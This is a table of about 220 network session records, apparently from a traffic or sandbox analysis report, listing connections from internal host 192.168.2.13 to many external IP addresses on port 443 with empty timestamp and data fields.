                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15229192.168.2.1342054121.214.31.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15230192.168.2.133849854.225.191.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15231192.168.2.134964695.164.55.24443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15232192.168.2.1356518191.167.68.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15233192.168.2.134676293.193.148.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15234192.168.2.1339830171.255.79.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15235192.168.2.135521240.91.26.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15236192.168.2.135111812.70.156.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15237192.168.2.1359712216.183.144.160443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15238192.168.2.1333944196.85.217.92443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15239192.168.2.1351838115.22.7.32443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15240192.168.2.1337696126.77.231.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15241192.168.2.1344746187.171.91.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15242192.168.2.1338874142.108.194.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15243192.168.2.1347200107.198.162.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15244192.168.2.1345538143.165.27.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15245192.168.2.1345564172.123.56.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15246192.168.2.134591879.151.54.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15247192.168.2.1333044213.179.252.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15248192.168.2.1357380170.205.62.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15249192.168.2.13581221.51.240.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15250192.168.2.135728259.203.42.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15251192.168.2.1360512124.149.148.19443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15252192.168.2.1334948137.94.44.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15253192.168.2.1352560171.9.169.238443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15254192.168.2.1354228136.24.100.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15255192.168.2.133338652.233.177.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15256192.168.2.1358544209.65.48.0443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15257192.168.2.135665445.239.148.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15258192.168.2.1341886141.167.0.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15259192.168.2.1355470212.85.233.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15260192.168.2.1340956111.56.135.198443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15261192.168.2.134696613.214.156.203443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15262192.168.2.1340734195.149.6.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15263192.168.2.1340104152.189.235.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15264192.168.2.133542070.11.204.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15265192.168.2.1341288219.95.206.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15266192.168.2.135840688.29.190.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15267192.168.2.134968077.44.194.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15268192.168.2.1351820116.207.114.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15269192.168.2.1345060171.14.136.230443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15270192.168.2.135825660.60.101.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15271192.168.2.1359514104.244.126.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15272192.168.2.134651081.4.95.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15273192.168.2.1356214152.15.73.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15274192.168.2.134403435.49.14.127443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15275192.168.2.1346386176.145.144.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15276192.168.2.133408478.226.134.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15277192.168.2.1355228212.200.68.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15278192.168.2.1356204116.48.6.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15279192.168.2.1350048190.82.129.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15280192.168.2.1356022213.120.189.33443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15281192.168.2.1336348199.9.244.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15282192.168.2.136026462.78.220.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15283192.168.2.135086040.186.157.99443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15284192.168.2.134016845.175.41.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15285192.168.2.133816835.247.113.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15286192.168.2.1356370168.87.174.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15287192.168.2.1345992176.210.53.171443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15288192.168.2.1349630209.77.79.14443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15289192.168.2.135570252.215.142.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15290192.168.2.135179049.21.124.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15291192.168.2.135988437.113.243.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15292192.168.2.1345890160.77.113.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15293192.168.2.135246063.103.163.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15294192.168.2.1353188184.114.72.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15295192.168.2.1347894130.233.174.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15296192.168.2.1347532186.160.147.40443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15297192.168.2.135316468.102.35.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15298192.168.2.1344846134.155.150.215443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15299192.168.2.1359860111.23.13.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15300192.168.2.1344580134.241.7.146443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15301192.168.2.1357882168.160.172.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15302192.168.2.1351038176.170.199.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15303192.168.2.135590231.87.161.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15304192.168.2.13517429.84.161.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15305192.168.2.1349258110.72.206.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15306192.168.2.1354580112.129.88.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15307192.168.2.13398521.101.204.124443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15308192.168.2.136079490.202.16.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15309192.168.2.134845814.255.63.225443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15310192.168.2.1336368146.239.207.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15311192.168.2.135364882.193.129.51443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15312192.168.2.134183236.57.118.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15313192.168.2.1345490146.46.61.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15314192.168.2.133442659.182.144.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15315192.168.2.135035293.207.196.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15316192.168.2.1348222130.95.181.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15317192.168.2.1346746163.125.120.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15318192.168.2.133438468.23.208.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15319192.168.2.1347790171.4.51.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15320192.168.2.134267094.241.92.41443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15321192.168.2.134651083.158.32.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15322192.168.2.134066274.122.241.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15323192.168.2.1354488148.222.210.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15324192.168.2.134294289.112.121.55443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15325192.168.2.133847088.119.30.29443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15326192.168.2.1353300194.57.216.75443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15327192.168.2.1359966164.141.252.131443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15328192.168.2.133356452.41.132.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15329192.168.2.13354744.131.81.132443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15330192.168.2.1348374133.92.130.239443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15331192.168.2.1352806108.13.25.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15332192.168.2.133334464.41.239.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15333192.168.2.1342676163.146.105.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15334192.168.2.1342344171.50.186.234443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15335192.168.2.1340084191.195.7.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15336192.168.2.1353072150.199.180.246443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15337192.168.2.13485201.141.62.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15338192.168.2.1343604183.186.98.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15339192.168.2.134759887.112.226.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15340192.168.2.1355726124.132.79.105443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15341192.168.2.134200070.159.58.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15342192.168.2.1351480120.244.254.18443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15343192.168.2.134444813.125.43.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15344192.168.2.1352678166.12.200.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15345192.168.2.1360670168.212.191.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15346192.168.2.135482458.177.97.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15347192.168.2.1334130150.16.36.183443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15348192.168.2.134320620.101.57.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15349192.168.2.1337534172.94.172.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15350192.168.2.13460588.28.120.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15351192.168.2.134148478.240.136.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15352192.168.2.1345514117.128.139.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15353192.168.2.135104691.1.15.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15354192.168.2.134493625.102.25.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15355192.168.2.135838837.232.164.214443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15356192.168.2.1346758187.247.15.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15357192.168.2.1334988164.105.98.54443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15358192.168.2.134375461.72.134.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15359192.168.2.1347244133.89.158.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15360192.168.2.134743447.200.44.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15361192.168.2.135082684.204.136.28443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15362192.168.2.1359860157.41.28.169443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15363192.168.2.135717482.190.43.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15364192.168.2.134239034.147.252.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15365192.168.2.134340876.205.225.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15366192.168.2.1352776133.195.17.175443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15367192.168.2.134575861.17.186.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15368192.168.2.134172048.149.48.103443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15369192.168.2.135376671.218.124.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15370192.168.2.134949444.90.157.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15371192.168.2.1341618202.230.191.101443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15372192.168.2.135728271.221.162.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15373192.168.2.1344844193.166.165.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15374192.168.2.1355108166.94.230.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15375192.168.2.135115672.215.58.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15376192.168.2.13381121.14.30.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15377192.168.2.1338228165.169.20.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15378192.168.2.1360640193.80.101.140443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15379192.168.2.1333886105.239.70.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15380192.168.2.13516749.36.23.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15381192.168.2.1343898160.130.91.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15382192.168.2.1333520186.210.113.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15383192.168.2.1347676131.136.235.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15384192.168.2.133762419.252.162.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15385192.168.2.1346492185.49.105.73443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15386192.168.2.133749892.85.190.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15387192.168.2.1339480167.60.151.186443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15388192.168.2.1351066113.187.172.185443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15389192.168.2.136012491.86.246.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15390192.168.2.135530027.25.216.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15391192.168.2.135320659.243.52.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15392192.168.2.1343470192.43.115.58443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15393192.168.2.135354665.66.80.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15394192.168.2.1359214165.251.160.108443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15395192.168.2.134961027.232.177.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15396192.168.2.133786427.69.87.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15397192.168.2.1358714120.197.81.252443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15398192.168.2.133446658.233.36.172443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15399192.168.2.1357434123.140.194.59443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15400192.168.2.1333858222.95.220.229443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15401192.168.2.1359428103.208.81.97443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15402192.168.2.1337034203.93.11.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15403192.168.2.133660823.26.101.57443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15404192.168.2.134442861.174.180.158443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15405192.168.2.133955696.150.221.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15406192.168.2.134089883.90.238.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15407192.168.2.1360480116.18.21.144443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15408192.168.2.1360964191.133.157.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15409192.168.2.1347826131.122.188.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15410192.168.2.1339158204.188.148.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15411192.168.2.1342936161.234.203.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15412192.168.2.1351018207.202.244.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15413192.168.2.1354732101.10.157.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15414192.168.2.134459261.186.40.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15415192.168.2.1345304124.53.59.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15416192.168.2.1353100140.19.81.200443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15417192.168.2.1356354203.248.110.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15418192.168.2.1352518172.105.212.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15419192.168.2.135872012.101.35.243443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15420192.168.2.1357362126.64.48.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15421192.168.2.1348780140.210.254.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15422192.168.2.134127871.137.208.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15423192.168.2.134482088.97.123.71443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15424192.168.2.1346930176.131.45.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15425192.168.2.1352828100.197.77.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15426192.168.2.1338422147.125.88.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15427192.168.2.1345730108.167.130.114443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15428192.168.2.135936012.137.23.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15429192.168.2.1353128211.138.83.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15430192.168.2.1358484161.65.78.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15431192.168.2.134103299.141.166.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15432192.168.2.135768043.67.152.78443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15433192.168.2.13535349.104.128.149443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15434192.168.2.1353264155.39.82.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15435192.168.2.135225420.85.76.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15436192.168.2.1350116160.76.239.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15437192.168.2.1338578106.4.251.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15438192.168.2.135819036.250.144.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15439192.168.2.1348426160.233.217.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15440192.168.2.135881678.192.147.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15441192.168.2.1352484160.154.214.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15442192.168.2.1359938109.152.111.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15443192.168.2.135484625.66.125.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15444192.168.2.134291676.92.69.26443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15445192.168.2.1357872136.176.148.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15446192.168.2.135876419.162.105.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15447192.168.2.135253872.17.114.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15448192.168.2.1352904140.36.187.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15449192.168.2.1343686138.97.245.65443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    15450192.168.2.1359890182.144.83.176443
                                    TimestampBytes transferredDirectionData


